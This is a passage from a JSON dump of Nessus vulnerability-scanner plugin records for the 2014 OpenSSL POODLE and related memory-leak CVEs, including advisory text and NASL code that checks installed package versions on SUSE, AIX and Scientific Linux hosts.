\"CVE-2014-3567\", \"CVE-2014-3568\");\n script_bugtraq_id(70574, 70585, 70586);\n\n script_name(english:\"SUSE SLES10 Security Update : OpenSSL (SUSE-SU-2014:1387-1) (POODLE)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This OpenSSL update fixes the following issues :\n\n - Session Ticket Memory Leak (CVE-2014-3567)\n\n - Build option no-ssl3 is incomplete ((CVE-2014-3568)\n\n - Add support for TLS_FALLBACK_SCSV to mitigate\n CVE-2014-3566 (POODLE)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=901223\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=901277\"\n );\n # https://download.suse.com/patch/finder/?keywords=1960c50f351e883d9bffe5194436ac38\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c6de12a1\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-3566/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-3567/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-3568/\"\n );\n # https://www.suse.com/support/update/announcement/2014/suse-su-20141387-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1717e36a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected OpenSSL packages\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssl-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/10\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES10)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES10\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES10\" && (! ereg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES10 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"x86_64\", reference:\"openssl-32bit-0.9.8a-18.86.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"x86_64\", reference:\"openssl-devel-32bit-0.9.8a-18.86.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"s390x\", reference:\"openssl-32bit-0.9.8a-18.86.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"s390x\", reference:\"openssl-devel-32bit-0.9.8a-18.86.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"openssl-0.9.8a-18.86.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"openssl-devel-0.9.8a-18.86.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"openssl-doc-0.9.8a-18.86.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"OpenSSL\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:20:00", "references": ["https://www.openssl.org/~bodo/ssl-poodle.pdf", "https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00", "https://www.openssl.org/news/openssl-1.0.1-notes.html", "https://www.imperialviolet.org/2014/10/14/poodle.html", "https://www14.software.ibm.com/webapp/iwm/web/preLogin.do?source=aixbp", "https://www.openssl.org/news/secadv/20141015.txt", "https://www.openssl.org/news/vulnerabilities.html", "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory11.asc"], "pluginID": "78772", "description": "The version of OpenSSL installed on the remote host is affected by the\nfollowing vulnerabilities :\n\n - An error exists related to DTLS SRTP extension handling\n and specially crafted handshake messages that can allow\n denial of service attacks via memory leaks.\n (CVE-2014-3513)\n\n - A man-in-the-middle (MitM) information disclosure\n vulnerability known as POODLE. The vulnerability is due\n to the way SSL 3.0 handles padding bytes when decrypting\n messages encrypted using block ciphers in cipher block\n chaining (CBC) mode. MitM attackers can decrypt a\n selected byte of a cipher text in as few as 256 tries if\n they are able to force a victim application to\n repeatedly send the same data over newly created SSL 3.0\n connections. (CVE-2014-3566)\n\n - An error exists related to session ticket handling that\n can allow denial of service attacks via memory leaks.\n (CVE-2014-3567)", "edition": 12, "reporter": "Tenable", "published": "2014-10-31T00:00:00", "title": "AIX OpenSSL Advisory : openssl_advisory11.asc (POODLE)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "AIX Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567"], "modified": "2018-11-28T00:00:00", "cpe": ["cpe:/a:openssl:openssl", "cpe:/o:ibm:aix"], "id": "AIX_OPENSSL_ADVISORY11.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=78772", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory openssl_advisory11.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78772);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/11/28 22:47:41\");\n\n script_cve_id(\"CVE-2014-3513\", \"CVE-2014-3566\", \"CVE-2014-3567\");\n script_bugtraq_id(70574, 70584, 70586);\n\n script_name(english:\"AIX OpenSSL Advisory : openssl_advisory11.asc (POODLE)\");\n script_summary(english:\"Checks the version of the OpenSSL packages and iFixes.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote AIX host has a version of OpenSSL installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of OpenSSL installed on the remote host is affected by the\nfollowing vulnerabilities :\n\n - An error exists related to DTLS SRTP extension handling\n and specially crafted handshake messages that can allow\n denial of service attacks via memory leaks.\n (CVE-2014-3513)\n\n - A man-in-the-middle (MitM) information disclosure\n vulnerability known as POODLE. The vulnerability is due\n to the way SSL 3.0 handles padding bytes when decrypting\n messages encrypted using block ciphers in cipher block\n chaining (CBC) mode. MitM attackers can decrypt a\n selected byte of a cipher text in as few as 256 tries if\n they are able to force a victim application to\n repeatedly send the same data over newly created SSL 3.0\n connections. (CVE-2014-3566)\n\n - An error exists related to session ticket handling that\n can allow denial of service attacks via memory leaks.\n (CVE-2014-3567)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://aix.software.ibm.com/aix/efixes/security/openssl_advisory11.asc\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www14.software.ibm.com/webapp/iwm/web/preLogin.do?source=aixbp\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/openssl-1.0.1-notes.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20141015.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2014/10/14/poodle.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/~bodo/ssl-poodle.pdf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00\");\n script_set_attribute(attribute:\"solution\", value:\n\"A fix is available and can be downloaded from the AIX website.\n\nIMPORTANT : If possible, it is recommended that a mksysb backup of the\nsystem be created. Verify that it is both bootable and readable before\nproceeding.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:openssl:openssl\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/31\");\n\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\ninclude(\"aix.inc\");\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This AIX package check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\n#0.9.8.2503\nif (aix_check_ifix(release:\"5.3\", patch:\"IV66250s9b\", package:\"openssl.base\", minfilesetver:\"0.0.0.0\", maxfilesetver:\"0.9.8.2503\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", patch:\"IV66250s9b\", package:\"openssl.base\", minfilesetver:\"0.0.0.0\", maxfilesetver:\"0.9.8.2503\") < 0) flag++;\nif (aix_check_ifix(release:\"7.1\", patch:\"IV66250s9b\", package:\"openssl.base\", minfilesetver:\"0.0.0.0\", maxfilesetver:\"0.9.8.2503\") < 0) flag++;\n\n#1.0.1.512\nif (aix_check_ifix(release:\"5.3\", patch:\"IV66250s9a\", package:\"openssl.base\", minfilesetver:\"1.0.1.500\", maxfilesetver:\"1.0.1.512\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", patch:\"IV66250s9a\", package:\"openssl.base\", minfilesetver:\"1.0.1.500\", maxfilesetver:\"1.0.1.512\") < 0) flag++;\nif (aix_check_ifix(release:\"7.1\", patch:\"IV66250s9a\", package:\"openssl.base\", minfilesetver:\"1.0.1.500\", maxfilesetver:\"1.0.1.512\") < 0) flag++;\n\n#12.9.8.2503\nif (aix_check_ifix(release:\"5.3\", patch:\"IV66250s9c\", package:\"openssl.base\", minfilesetver:\"12.0.0.0\", maxfilesetver:\"12.9.8.2503\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", patch:\"IV66250s9c\", package:\"openssl.base\", minfilesetver:\"12.0.0.0\", maxfilesetver:\"12.9.8.2503\") < 0) flag++;\nif (aix_check_ifix(release:\"7.1\", patch:\"IV66250s9c\", package:\"openssl.base\", minfilesetver:\"12.0.0.0\", maxfilesetver:\"12.9.8.2503\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:aix_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:19:56", "references": ["http://www.nessus.org/u?b897d8d4"], "pluginID": "78537", "description": "This update adds support for the TLS Fallback Signaling Cipher Suite\nValue (TLS_FALLBACK_SCSV), which can be used to prevent protocol\ndowngrade attacks against applications which re-connect using a lower\nSSL/TLS protocol version when the initial connection indicating the\nhighest supported protocol version fails.\n\nThis can prevent a forceful downgrade of the communication to SSL 3.0.\nThe SSL 3.0 protocol was found to be vulnerable to the padding oracle\nattack when using block cipher suites in cipher block chaining (CBC)\nmode. This issue is identified as CVE-2014-3566, and also known under\nthe alias POODLE. This SSL 3.0 protocol flaw will not be addressed in\na future update; it is recommended that users configure their\napplications to require at least TLS protocol version 1.0 for secure\ncommunication.\n\nFor additional information about this flaw, see Upstream's\nKnowledgebase article at https://access.redhat.com/articles/1232123\n\nA memory leak flaw was found in the way OpenSSL parsed the DTLS Secure\nReal-time Transport Protocol (SRTP) extension data. A remote attacker\ncould send multiple specially crafted handshake messages to exhaust\nall available memory of an SSL/TLS or DTLS server. (CVE-2014-3513)\n\nA memory leak flaw was found in the way an OpenSSL handled failed\nsession ticket integrity checks. A remote attacker could exhaust all\navailable memory of an SSL/TLS or DTLS server by sending a large\nnumber of invalid session tickets to that server. (CVE-2014-3567)\n\nCVE-2014-3566 issue and correct the CVE-2014-3513 and CVE-2014-3567\nissues. For the update to take effect, all services linked to the\nOpenSSL library (such as httpd and other SSL-enabled services) must be\nrestarted or the system rebooted.", "edition": 8, "reporter": "Tenable", "published": "2014-10-17T00:00:00", "title": "Scientific Linux Security Update : openssl on SL6.x, SL7.x i386/x86_64 (POODLE)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Scientific Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567"], "modified": "2018-12-28T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20141016_OPENSSL_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=78537", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78537);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/12/28 10:10:35\");\n\n script_cve_id(\"CVE-2014-3513\", \"CVE-2014-3566\", \"CVE-2014-3567\");\n\n script_name(english:\"Scientific Linux Security Update : openssl on SL6.x, SL7.x i386/x86_64 (POODLE)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update adds support for the TLS Fallback Signaling Cipher Suite\nValue (TLS_FALLBACK_SCSV), which can be used to prevent protocol\ndowngrade attacks against applications which re-connect using a lower\nSSL/TLS protocol version when the initial connection indicating the\nhighest supported protocol version fails.\n\nThis can prevent a forceful downgrade of the communication to SSL 3.0.\nThe SSL 3.0 protocol was found to be vulnerable to the padding oracle\nattack when using block cipher suites in cipher block chaining (CBC)\nmode. This issue is identified as CVE-2014-3566, and also known under\nthe alias POODLE. This SSL 3.0 protocol flaw will not be addressed in\na future update; it is recommended that users configure their\napplications to require at least TLS protocol version 1.0 for secure\ncommunication.\n\nFor additional information about this flaw, see Upstream's\nKnowledgebase article at https://access.redhat.com/articles/1232123\n\nA memory leak flaw was found in the way OpenSSL parsed the DTLS Secure\nReal-time Transport Protocol (SRTP) extension data. A remote attacker\ncould send multiple specially crafted handshake messages to exhaust\nall available memory of an SSL/TLS or DTLS server. (CVE-2014-3513)\n\nA memory leak flaw was found in the way an OpenSSL handled failed\nsession ticket integrity checks. A remote attacker could exhaust all\navailable memory of an SSL/TLS or DTLS server by sending a large\nnumber of invalid session tickets to that server. (CVE-2014-3567)\n\nCVE-2014-3566 issue and correct the CVE-2014-3513 and CVE-2014-3567\nissues. For the update to take effect, all services linked to the\nOpenSSL library (such as httpd and other SSL-enabled services) must be\nrestarted or the system rebooted.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1410&L=scientific-linux-errata&T=0&P=933\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b897d8d4\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/16\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"openssl-1.0.1e-30.el6_6.2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"openssl-debuginfo-1.0.1e-30.el6_6.2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"openssl-devel-1.0.1e-30.el6_6.2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"openssl-perl-1.0.1e-30.el6_6.2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"openssl-static-1.0.1e-30.el6_6.2\")) flag++;\n\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"openssl-1.0.1e-34.el7_0.6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"openssl-debuginfo-1.0.1e-34.el7_0.6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"openssl-devel-1.0.1e-34.el7_0.6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"openssl-libs-1.0.1e-34.el7_0.6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"openssl-perl-1.0.1e-34.el7_0.6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"openssl-static-1.0.1e-34.el7_0.6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:19:56", "references": ["https://www.openssl.org/news/openssl-1.0.0-notes.html", "https://www.openssl.org/~bodo/ssl-poodle.pdf", "https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00", "https://www.imperialviolet.org/2014/10/14/poodle.html", "https://www.openssl.org/news/secadv/20141015.txt", "https://www.openssl.org/news/vulnerabilities.html"], "pluginID": "78553", "description": "According to its banner, the remote web server uses a version of\nOpenSSL 1.0.0 prior to 1.0.0o. The OpenSSL library is, therefore,\naffected by the following vulnerabilities :\n\n - An error exists related to the way SSL 3.0 handles\n padding bytes when decrypting messages encrypted using\n block ciphers in cipher block chaining (CBC) mode. A\n man-in-the-middle attacker can decrypt a selected byte\n of a cipher text in as few as 256 tries if they are able\n to force a victim application to repeatedly send the\n same data over newly created SSL 3.0 connections. This\n is also known as the 'POODLE' issue. (CVE-2014-3566)\n\n - An error exists related to session ticket handling that\n can allow denial of service attacks via memory leaks.\n (CVE-2014-3567)\n\n - An error exists related to the build configuration\n process and the 'no-ssl3' build option that allows\n servers and clients to process insecure SSL 3.0\n handshake messages. (CVE-2014-3568)", "edition": 6, "reporter": "Tenable", "published": "2014-10-17T00:00:00", "title": "OpenSSL 1.0.0 < 1.0.1o Multiple Vulnerabilities (POODLE)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Web Servers", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2018-07-16T00:00:00", "cpe": ["cpe:/a:openssl:openssl"], "id": "OPENSSL_1_0_0O.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=78553", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78553);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/07/16 14:09:14\");\n\n script_cve_id(\"CVE-2014-3566\", \"CVE-2014-3567\", \"CVE-2014-3568\");\n script_bugtraq_id(70574, 70585, 70586);\n script_xref(name:\"CERT\", value:\"577193\");\n\n script_name(english:\"OpenSSL 1.0.0 < 1.0.1o Multiple Vulnerabilities (POODLE)\");\n script_summary(english:\"Performs a banner check.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote service is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the remote web server uses a version of\nOpenSSL 1.0.0 prior to 1.0.0o. The OpenSSL library is, therefore,\naffected by the following vulnerabilities :\n\n - An error exists related to the way SSL 3.0 handles\n padding bytes when decrypting messages encrypted using\n block ciphers in cipher block chaining (CBC) mode. A\n man-in-the-middle attacker can decrypt a selected byte\n of a cipher text in as few as 256 tries if they are able\n to force a victim application to repeatedly send the\n same data over newly created SSL 3.0 connections. This\n is also known as the 'POODLE' issue. (CVE-2014-3566)\n\n - An error exists related to session ticket handling that\n can allow denial of service attacks via memory leaks.\n (CVE-2014-3567)\n\n - An error exists related to the build configuration\n process and the 'no-ssl3' build option that allows\n servers and clients to process insecure SSL 3.0\n handshake messages. (CVE-2014-3568)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/openssl-1.0.0-notes.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20141015.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2014/10/14/poodle.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/~bodo/ssl-poodle.pdf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to OpenSSL 1.0.0o or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:openssl:openssl\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"openssl_version.nasl\");\n script_require_keys(\"openssl/port\");\n\n exit(0);\n}\n\ninclude(\"openssl_version.inc\");\n\nopenssl_check_version(fixed:'1.0.0o', min:\"1.0.0\", severity:SECURITY_WARNING);\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:20:03", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=901223", "https://bugzilla.novell.com/show_bug.cgi?id=892403", "http://support.novell.com/security/cve/CVE-2014-3566.html", "https://bugzilla.novell.com/show_bug.cgi?id=901277", "http://support.novell.com/security/cve/CVE-2014-3568.html", "http://support.novell.com/security/cve/CVE-2014-3567.html"], "pluginID": "78886", "description": "This OpenSSL update fixes the following issues :\n\n - Session Ticket Memory Leak. (CVE-2014-3567)\n\n - Build option no-ssl3 is incomplete. (CVE-2014-3568)\n\n - Add support for TLS_FALLBACK_SCSV to mitigate\n CVE-2014-3566 (POODLE)", "edition": 5, "reporter": "Tenable", "published": "2014-11-06T00:00:00", "title": "SuSE 11.3 Security Update : OpenSSL (SAT Patch Number 9915)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2015-01-28T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:openssl", "p-cpe:/a:novell:suse_linux:11:libopenssl0_9_8-hmac", "p-cpe:/a:novell:suse_linux:11:libopenssl0_9_8-32bit", "p-cpe:/a:novell:suse_linux:11:libopenssl0_9_8", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:openssl-doc", "p-cpe:/a:novell:suse_linux:11:libopenssl0_9_8-hmac-32bit"], "id": "SUSE_11_LIBOPENSSL-DEVEL-141024.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=78886", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78886);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 